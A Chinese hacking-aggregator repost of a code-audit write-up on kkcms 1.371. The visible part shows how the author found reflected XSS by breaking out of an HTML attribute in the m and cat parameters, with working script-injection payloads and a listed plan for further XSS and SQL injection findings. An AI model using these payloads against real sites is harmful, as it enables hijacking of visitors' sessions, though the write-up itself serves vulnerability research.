记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

kkcms 1.371 代码审计-实战篇

2021-03-28 23:15

免责声明:

             “ 本公众号所有文章, 仅用于交流学习,禁止应用到不当途径,因滥用而产生的风险皆与本人无关!



目录:

  • 3处反射型xss (黑盒)

  • 3处存储型xss (黑盒)

  • 4处前台sql注入 (黑盒+白盒)

  • n处后台sql注入 (黑盒)


反射型XSS

发现参数m/cat/page, 开始挨个测试

?m=<script>alert(2021)</script>?cat=all&page=1

没弹窗? 发现插入的payload变成了这样:

这不就是妥妥的一枚xss嘛?

先闭合标签a

?m=><script>alert(2021)</script>?cat=all&page=1

再闭合"

?m="><script>alert(2021)</script>?cat=all&page=1

小窗窗终于弹起来了:

同样的payload,扔给第2个参数

?m=/dianying/list.php?cat="><script>alert(2021)</script>&page=1

又一枚xss到手,果然挖洞得"敢想敢做"


知识来源: https://mp.weixin.qq.com/s?__biz=MzU0MDg5MzIzMQ==&mid=2247485517&idx=1&sn=24b6f24b506ecaa64ec2897e8302ee7b

阅读:89708 | 评论:0 | 标签:cms 审计

想收藏或者和大家分享这篇好文章→复制链接地址

“kkcms 1.371 代码审计-实战篇”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求赞助求支持💖

标签云